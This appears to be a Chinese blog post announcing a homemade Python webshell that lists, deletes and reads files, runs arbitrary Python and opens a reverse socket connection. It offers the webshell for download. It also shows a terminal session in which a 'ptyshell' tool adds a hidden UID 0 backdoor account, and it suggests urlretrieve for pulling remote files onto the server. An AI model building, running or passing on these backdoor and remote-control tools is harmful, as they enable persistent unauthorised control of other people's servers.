操作系统和网络技术研究
python版的webshell。
1.0版本的功能有:
1、文件、文件夹相关信息统计与操作功能,比如:列、删除、复制、读取、创建等等。
2、服务器信息查看。
3、执行自定义python命令。
4、socket反弹。
这个周末随写而成,界面清爽,目前这个webshell使用起来还是比较爽的,我没加上文件的上传与下载功能,因为使用python进行基于web的文件上传下载我还不清楚如何进行,目前想到一个方案:
urllib.urlretrieve(url,localpath) #直接在webshell内执行这段代码,下载远程域上url对应的资源到localpath指定的服务端路径。
这个webshell其实还比较多功能可以去设计,出于研究学习的目的只要有时间我就会继续完善。其中“Socket反弹”这个功能需要你在本地开个python socket与你的webshell进行通信,如果这个设计好的话,会非常的爽,使用过rpyc的朋友就会知道了:)。
这个webshell提供了一种思路框架,还不成熟,v1.0提供下载:
作者:xi4oyu
[test@localhost tmp]$ ls -l
total 488
-rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static
[test@localhost tmp]$ md5sum ptyshell-static
3ea2a909f736660097c0248d403bbe80 ptyshell-static
[test@localhost tmp]$ ./ptyshell-static
ptyshell v0.4
orignal written by wzt ,psexec feature added by xi4oyu
usage: ./ptyshell-static | ./ptyshell-static -u username -p password -c command -pd port
使用方法:
[test@localhost tmp]$ ./ptyshell-static 4444
[test@localhost tmp]$ grep xxoxx /et c/passwd
[test@localhost tmp]$ ./ptyshell-static -u root -p test -c "useradd -u 0 -o xxoxx" -dp 4444
Beginning to send command!
[test@localhost tmp]$ grep xxoxx /et c/passwd
xxoxx:x:0:510::/home/xxoxx:/bi n/bash
[test@localhost tmp]$
执行第二个命令的时候需要等待几秒,以后的命令执行都不需要再执行./ptyshell-stat 4444了。直接执行第二个命令就行。注意命令用""包含起来,命令表太长了,哈哈,否则不能执行可别怪我。
这里webshell里面也可以执行的,一个道理,呵呵。纯属2B之作,大家随便玩玩。
感谢tr宝宝提供空间
http://www.pcsec.org/upload/2008/12/ptyshell-static.rar